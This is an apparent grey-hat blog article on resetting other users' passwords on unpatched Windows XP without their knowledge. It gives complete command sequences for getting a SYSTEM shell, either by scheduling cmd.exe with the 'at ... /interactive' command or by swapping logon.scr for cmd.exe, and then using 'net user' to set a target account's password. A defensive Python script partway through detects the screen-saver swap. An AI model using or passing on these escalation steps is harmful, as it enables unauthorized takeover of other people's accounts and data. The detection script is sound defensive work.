Categories: Impress Your Friends, Grey Hat, Passwords and Keys, Windows
Last month, I wrote about automatically cracking the Windows XP password with
Ophcrack. In that article, I showed how simple it is to download the live-CD *.iso image
of the Linux distribution, burn it, and boot the computer from it.
But sometimes it is not even necessary to get into a locked Windows machine that way.
There are even easier ways to access an account in Windows XP. These methods require no
downloads and no storage media (CDs or floppy disks) at all. The only caveat is that they
will never reveal the existing password. They only reset it, changing it to whatever
combination you choose.
Hidden Users
Microsoft Windows operating systems - all built on or based off the NT kernel - host
several users other than the ones we see every day like Mom, Dad, Sister, and
Brother. You rarely ever notice SYSTEM, NETWORK SERVICE, or LOCAL
SERVICE, but these unseen built-in accounts work alongside us every day to ensure that
everything runs smoothly. Since not every program can run under a logged-in user,
Windows provides these service accounts to run such processes.
Proof
Want proof? Press Ctrl + Alt + Del (or go to Start Menu, Run, and type taskmgr.exe). Then
click the Processes tab and make sure Show processes from all users is checked at the
bottom. If your current user is in the Administrators group, you can see these
hidden accounts.
Requirements
There are three requirements for this method. First, you need any type of user access, be it
a Limited User or Guest account. Second, either the Task Scheduler service has to be enabled
or a screen saver has to be configured. Lastly, Windows must not be patched. I'm pretty sure
Microsoft would have plugged the hole, since this discovery was a breakthrough in the tech
world last year.
AT Command
The AT command tells the operating system to run programs automatically at a set time. For
example, if you want a backup of a crucial file made every night, or want the dynamic DNS
provider updated with the current IP address, AT is at your command. It is the Windows
equivalent of the *nix cron command. The loophole is who runs the program when it is time
to execute it: the SYSTEM account runs the scheduled command instead of the user who
scheduled it. So, if you schedule cmd.exe to run in the next minute, you'll get a console
(DOS prompt) running as SYSTEM.
1. Go to Start Menu then Run
2. Type in cmd.exe
3. In the command prompt type at 4:25pm /interactive cmd.exe replacing the time
with the next minute.
4. When the new command prompt appears, type net user username password
replacing username with your target user and password with the password
combination that you want to set.
Screen Saver
When it is time for Windows to display the screen saver, the SYSTEM account runs the
screen saver file (which is pretty much an *.exe file renamed to *.scr). If you replace the
default screen saver file with a copy of cmd.exe, you will again obtain a console running as
SYSTEM.
1. Go to Start Menu then Run
2. Type in cmd.exe
3. Type cd\
4. Type cd\windows\system32
5. mkdir temphack
6. copy logon.scr temphack\logon.scr
7. copy cmd.exe temphack\cmd.exe
8. del logon.scr
9. rename cmd.exe logon.scr
10. exit
The next time the screen saver is due to run, a command prompt will appear instead.
Then you can type net user username password, replacing username with your target
user and password with the password combination that you want to set.
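From the defender's side, the screen saver swap above leaves two simple artifacts on disk: logon.scr in system32 becomes byte-identical to cmd.exe, and the stash folder holding the originals is left behind. The following check is an added example (not code from the original article); it assumes you point it at a system32 directory and builds a constructed clean tree and a constructed swapped tree with placeholder bytes to show both outcomes.

```python
import hashlib
import tempfile
from pathlib import Path

def sha256_of(path: Path) -> str:
    """Hash a file in chunks so large binaries do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def check_screensaver_swap(system32: Path) -> list:
    """Return findings for the swap described above; an empty list means clean."""
    findings = []
    scr, cmd = system32 / "logon.scr", system32 / "cmd.exe"
    if not scr.exists():
        return ["logon.scr is missing (deleted or renamed)"]
    if cmd.exists() and sha256_of(scr) == sha256_of(cmd):
        findings.append("logon.scr is byte-identical to cmd.exe: screen saver swapped for a shell")
    # The procedure leaves a stash folder holding the originals; look for it.
    for sub in system32.iterdir():
        if sub.is_dir() and (sub / "logon.scr").is_file() and (sub / "cmd.exe").is_file():
            findings.append(f"stash directory '{sub.name}' holds copies of logon.scr and cmd.exe")
    return findings

def build_fake_system32(base: Path, swapped: bool) -> Path:
    """Constructed stand-in for %SystemRoot%\\system32 with placeholder bytes, not real binaries."""
    root = base / ("swapped" if swapped else "clean")
    root.mkdir(parents=True)
    (root / "cmd.exe").write_bytes(b"MZ placeholder cmd")
    if swapped:
        stash = root / "temphack"
        stash.mkdir()
        (stash / "logon.scr").write_bytes(b"MZ placeholder scr")
        (stash / "cmd.exe").write_bytes(b"MZ placeholder cmd")
        (root / "logon.scr").write_bytes(b"MZ placeholder cmd")  # renamed cmd.exe
    else:
        (root / "logon.scr").write_bytes(b"MZ placeholder scr")
    return root

def demo() -> dict:
    """Run the check against a clean tree and a swapped tree built in a temp dir."""
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        return {
            "clean": check_screensaver_swap(build_fake_system32(base, False)),
            "swapped": check_screensaver_swap(build_fake_system32(base, True)),
        }
```

Call demo() to see both results, or pass Path(r"C:\Windows\system32") to check_screensaver_swap() on a real machine; a hash baseline of the known-good logon.scr would also catch a swap with any other binary, not only cmd.exe.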
Plan C (or the Nth Plan)
If you are still unable to reset the password, it's time to bust out a CD and burn
Ophcrack. Read my previous article for the specifics. But if your files are protected with
EFS (Encrypting File System), you're pretty much out of luck. The EFS keys are protected by
the Windows password, so if you reset the password you lose access to those files. Sorry,
but that's the way the cookie crumbles!